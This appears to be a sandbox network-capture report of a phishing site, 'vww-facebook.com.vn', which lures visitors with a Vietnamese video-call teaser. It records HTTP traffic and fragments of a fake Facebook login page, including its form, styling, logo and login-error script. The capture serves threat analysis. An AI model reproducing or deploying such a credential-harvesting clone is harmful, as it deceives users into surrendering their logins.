          2024-05-27 22:33:17 UTC1369INData Raw: 74 65 6e 74 3d 22 46 75 6c 6c 20 76 69 64 65 6f 20 63 61 6c 6c 20 76 69 64 65 6f 20 63 c3 b9 6e 67 20 6e 67 c6 b0 e1 bb 9d 69 20 79 c3 aa 75 20 62 e1 bb 8b 20 6c e1 bb 99 20 6d e1 bb 9b 69 20 6e 68 e1 ba a5 74 2e 56 69 64 65 6f 32 34 68 2e 63 6f 6d 22 20 2f 3e 0a 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 75 6c 6c 20 76 69 64 65 6f 20 63 61 6c 6c 20 76 69 64 65 6f 20 63 c3 b9 6e 67 20 6e 67 c6 b0 e1 bb 9d 69 20 79 c3 aa 75 20 62 e1 bb 8b 20 6c e1 bb 99 20 6d e1 bb 9b 69 20 6e 68 e1 ba a5 74 2e 56 69 64 65 6f 32 34 68 2e 63 6f 6d 22 20 2f 3e 0a 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e
          Data Ascii: tent="Full video call video cng ngi yu b l mi nht.Video24h.com" /> <meta property="twitter:description" content="Full video call video cng ngi yu b l mi nht.Video24h.com" /> <meta property="twitter:card" con
          2024-05-27 22:33:17 UTC1369INData Raw: 76 20 69 64 3d 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 74 68 65 6d 65 2f 66 62 77 65 62 31 2f 6c 6f 67 6f 2e 73 76 67 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 69 64 3d 22 74 6b 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d
          Data Ascii: v id="error"></div> <div class="logo"> <img src="/theme/fbweb1/logo.svg" alt="Logo"> </div> <div class="container"> <div class="input-group input"> <input type="text" id="tk" placeholder=
          2024-05-27 22:33:17 UTC1369INData Raw: 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 73 70 61 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 2d 66 6f 74 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 73 70 61 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 3e 45 6e 67 6c 69 73 68 20 28 55 4b 29 3c 2f 61 3e 0a 20 20 20 20
          Data Ascii: <span class="lang-span"> <a>Franais (France)</a> </span> </div> </div> <div class="item-fot"> <div class="lang"> <span class="lang-span"> <a>English (UK)</a>
          2024-05-27 22:33:17 UTC860INData Raw: 75 73 20 3d 3d 20 27 65 72 72 6f 72 27 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 6f 6b 27 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 27 64 69 73 61 62 6c 65 64 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 6f 6b 27 29 2e 68 74 6d 6c 28 27 c4 90 c4 83 6e 67 20 6e 68 e1 ba ad 70 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 2e 6e 6f 74 69 6c 6f 67 22 29 2e 72 65 6d 6f 76 65 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 6b 27 29 2e 73 74 79 6c 65 20 3d 20 27 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 41 33 45 33 45 3b 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          Data Ascii: us == 'error') { $('#ok').removeAttr('disabled'); $('#ok').html('ng nhp'); $(".notilog").remove() document.getElementById('tk').style = 'border: 1px solid #FA3E3E;';
          2024-05-27 22:33:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449735188.114.96.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:17 UTC656OUTGET /theme/fbweb1/fbstyle.css HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:17 UTC778INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:17 GMT
          Content-Type: text/css
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Thu, 23 May 2024 16:28:57 GMT
          etag: W/"b66-65b6bf70-3803fbf;br"
          last-modified: Sun, 28 Jan 2024 20:56:16 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5409
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDs3Ep9fRBQYRWtQ3ceti3cxKhRcQSqAQSh%2FmBP9g4N7hY0KFPFPXiSxaZZzhL2bimq4dlxghbqp5DFYSzuyGN5SILmXQdHbKmJdBhleRdP8gSvqSosoGmqaHmN%2BiDj5AQVC5rju"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9773c99304207-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:17 UTC591INData Raw: 62 36 36 0d 0a 0a 0a 2e 61 6c 65 72 74 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 30 37 31 61 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 33 65 62 65 62 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 7d 0a 0a 2e 61 6c 65 72 74 20 73 70 61 6e 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 70 61
          Data Ascii: b66.alert { background-color: #f3071a; color: #f3ebeb; padding: 0; margin: 0; text-align: left; position: fixed; top: 0; left: 0; width: 100%; line-height: 1.5;}.alert span { display: inline-block; pa
          2024-05-27 22:33:17 UTC1369INData Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 34 35 70 78 3b 0a 7d 0a 0a 0a 2e 6f 76 65 72 6c 61 79 2d 69 63 6f 6e 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 2e 6f 76 65 72 6c 61 79 2d 74 65 78 74 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a
          Data Ascii: splay: flex; flex-direction: column; align-items: center;}.logo { text-align: center; margin-bottom: 5px;}.logo img { width: 145px;}.overlay-icon { font-size: 40px; margin-bottom: 20px;}.overlay-text { font-siz
          2024-05-27 22:33:17 UTC965INData Raw: 67 69 6e 3a 20 31 35 70 78 20 30 3b 0a 7d 0a 0a 2e 63 72 65 61 74 65 2d 61 63 63 6f 75 6e 74 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 20 30 20 31 32 70 78 20 30 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 62 65 63 33 63 39 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 66 6c
          Data Ascii: gin: 15px 0;}.create-account { margin: 12px 0 12px 0; border-radius: 4px; background: white; border-color: #bec3c9; border-style: solid; border-width: 1px; box-shadow: none; color: #000; display: inline-block; fl
          2024-05-27 22:33:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.449738188.114.96.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:17 UTC699OUTGET /theme/fbweb1/logo.svg HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:18 UTC783INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:18 GMT
          Content-Type: image/svg+xml
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Mon, 06 May 2024 19:20:45 GMT
          etag: W/"951-65b6d6da-3803fc0;br"
          last-modified: Sun, 28 Jan 2024 22:36:10 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5410
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvFUFrYXcpxSv4bcYLAg9sNh9REg9mRqEfgc1GBqRNlS0yxP86ooipYzxG4oajw5bdfVBYAMa11ORHlmSOhuoC7DU%2F4U4gMdqy03ODifyQh%2FnzsvTL1QJfySIdbvfGL0jWhweSGj"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9773fee858c6f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:18 UTC586INData Raw: 39 35 31 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 32 32 2e 35 31 20 33 36 30 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 31 38 37 37 46 32 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 74 69 74 6c 65 3e 46 42 57 6f 72 64 6d 61 72 6b 5f 48 65 78 2d 52 47 42 2d 31 30 32 34 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 36 36 2e 34 33 2c 31 32 36 2e 36 38 63 2d 39 2e 36 35 2c 30 2d 31 32 2e 34 34 2c 34 2e 32 38 2d 31 32 2e 34 34 2c 31
          Data Ascii: 951<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,1
          2024-05-27 22:33:18 UTC1369INData Raw: 2e 38 38 2c 36 2e 38 37 63 30 2c 31 35 2e 32 32 2c 35 2e 35 37 2c 32 35 2e 33 2c 31 39 2e 39 34 2c 32 35 2e 33 2c 31 32 2e 36 36 2c 30 2c 31 39 2e 30 39 2d 39 2e 32 32 2c 31 39 2e 30 39 2d 32 33 2e 38 56 32 30 32 63 30 2d 31 34 2e 35 38 2d 36 2e 34 33 2d 32 33 2e 38 2d 31 39 2e 30 39 2d 32 33 2e 38 2d 31 34 2e 33 37 2c 30 2d 31 39 2e 39 34 2c 31 30 2e 30 38 2d 31 39 2e 39 34 2c 32 35 2e 33 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 34 37 2c 31 35 33 2e 39 31 63 31 32 2c 30 2c 32 33 2e 33 37 2c 32 2e 35 38 2c 32 39 2e 35 39 2c 36 2e 38 36 6c 2d 36 2e 38 36 2c 32 31 2e 38 38 61 34 38 2e 36 2c 34 38 2e 36 2c 30 2c 30 2c 30 2d 32 30 2e 35 39 2d 34 2e 37 32 63 2d 31 36 2e 37 33 2c 30 2d 32 34 2c 39 2e 36 35 2d 32 34
          Data Ascii: .88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24
          2024-05-27 22:33:18 UTC437INData Raw: 32 33 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 37 31 33 2e 32 37 2c 32 30 39 2e 36 37 76 2d 35 2e 31 34 63 30 2d 32 39 2e 33 39 2c 31 36 2e 37 33 2d 35 30 2e 36 32 2c 35 30 2e 38 33 2d 35 30 2e 36 32 73 35 30 2e 38 33 2c 32 31 2e 32 33 2c 35 30 2e 38 33 2c 35 30 2e 36 32 76 35 2e 31 34 63 30 2c 32 39 2e 33 38 2d 31 36 2e 37 33 2c 35 30 2e 36 32 2d 35 30 2e 38 33 2c 35 30 2e 36 32 53 37 31 33 2e 32 37 2c 32 33 39 2e 30 35 2c 37 31 33 2e 32 37 2c 32 30 39 2e 36 37 5a 6d 37 30 2e 37 38 2d 37 2e 32 39 63 30 2d 31 33 2e 35 31 2d 35 2e 35 38 2d 32 34 2e 32 33 2d 31 39 2e 39 35 2d 32 34 2e 32 33 73 2d 31 39 2e 39 34 2c 31 30 2e 37 32 2d 31 39 2e 39 34 2c 32 34 2e 32 33 76 39 2e 34 34 63 30 2c 31 33 2e 35 31 2c 35 2e 35
          Data Ascii: 23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.5
          2024-05-27 22:33:18 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.449741188.114.97.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:18 UTC410OUTGET /theme/fbweb1/logo.svg HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:18 UTC795INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:18 GMT
          Content-Type: image/svg+xml
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Mon, 06 May 2024 19:20:45 GMT
          etag: W/"951-65b6d6da-3803fc0;br"
          last-modified: Sun, 28 Jan 2024 22:36:10 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5410
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dd8M6rUM%2Bzpz86n1x8CUfERM49yG%2F%2BW3jJT%2Bn%2B4LMMX908769f85fKWms4my2sExnq%2FTSNvu3E2jgVAOy%2B26WQBc3GyFqkrCKRw9oXwisjZagm2UzSYb8oo73%2FrnmQUOkieEkUdP"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a977444f058c5f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:18 UTC574INData Raw: 39 35 31 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 32 32 2e 35 31 20 33 36 30 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 31 38 37 37 46 32 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 74 69 74 6c 65 3e 46 42 57 6f 72 64 6d 61 72 6b 5f 48 65 78 2d 52 47 42 2d 31 30 32 34 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 36 36 2e 34 33 2c 31 32 36 2e 36 38 63 2d 39 2e 36 35 2c 30 2d 31 32 2e 34 34 2c 34 2e 32 38 2d 31 32 2e 34 34 2c 31
          Data Ascii: 951<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,1
          2024-05-27 22:33:18 UTC1369INData Raw: 34 31 2e 38 32 2d 35 30 5a 6d 33 30 2e 38 38 2c 36 2e 38 37 63 30 2c 31 35 2e 32 32 2c 35 2e 35 37 2c 32 35 2e 33 2c 31 39 2e 39 34 2c 32 35 2e 33 2c 31 32 2e 36 36 2c 30 2c 31 39 2e 30 39 2d 39 2e 32 32 2c 31 39 2e 30 39 2d 32 33 2e 38 56 32 30 32 63 30 2d 31 34 2e 35 38 2d 36 2e 34 33 2d 32 33 2e 38 2d 31 39 2e 30 39 2d 32 33 2e 38 2d 31 34 2e 33 37 2c 30 2d 31 39 2e 39 34 2c 31 30 2e 30 38 2d 31 39 2e 39 34 2c 32 35 2e 33 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 34 37 2c 31 35 33 2e 39 31 63 31 32 2c 30 2c 32 33 2e 33 37 2c 32 2e 35 38 2c 32 39 2e 35 39 2c 36 2e 38 36 6c 2d 36 2e 38 36 2c 32 31 2e 38 38 61 34 38 2e 36 2c 34 38 2e 36 2c 30 2c 30 2c 30 2d 32 30 2e 35 39 2d 34 2e 37 32 63 2d 31 36 2e 37 33 2c
          Data Ascii: 41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,
          2024-05-27 22:33:18 UTC449INData Raw: 31 30 2e 37 32 2c 32 30 2d 32 34 2e 32 33 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 37 31 33 2e 32 37 2c 32 30 39 2e 36 37 76 2d 35 2e 31 34 63 30 2d 32 39 2e 33 39 2c 31 36 2e 37 33 2d 35 30 2e 36 32 2c 35 30 2e 38 33 2d 35 30 2e 36 32 73 35 30 2e 38 33 2c 32 31 2e 32 33 2c 35 30 2e 38 33 2c 35 30 2e 36 32 76 35 2e 31 34 63 30 2c 32 39 2e 33 38 2d 31 36 2e 37 33 2c 35 30 2e 36 32 2d 35 30 2e 38 33 2c 35 30 2e 36 32 53 37 31 33 2e 32 37 2c 32 33 39 2e 30 35 2c 37 31 33 2e 32 37 2c 32 30 39 2e 36 37 5a 6d 37 30 2e 37 38 2d 37 2e 32 39 63 30 2d 31 33 2e 35 31 2d 35 2e 35 38 2d 32 34 2e 32 33 2d 31 39 2e 39 35 2d 32 34 2e 32 33 73 2d 31 39 2e 39 34 2c 31 30 2e 37 32 2d 31 39 2e 39 34 2c 32 34 2e 32 33 76 39 2e 34 34
          Data Ascii: 10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44
          2024-05-27 22:33:18 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.449744188.114.96.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:19 UTC689OUTGET /favicon.ico HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:20 UTC768INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:20 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: BYPASS
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8iH632P%2FvFoCLUAaTuEDS4Kv5TMx%2BS7tIiqhnb64cT07rnmWkdw%2BQfSju8ixC49vi9xTlgZaTcvpnXIcyjR1Id%2BOuChAZEr4UPyBilN8OTEC64L0Jky0wJy82wDclk4T%2BosucjGt"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9774bbb3241fb-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.4497452.19.104.72443
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-05-27 22:33:21 UTC467INHTTP/1.1 200 OK
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF06)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-weu-z1
          Cache-Control: public, max-age=149761
          Date: Mon, 27 May 2024 22:33:20 GMT
          Connection: close
          X-CID: 2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.449746188.114.97.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:21 UTC400OUTGET /favicon.ico HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
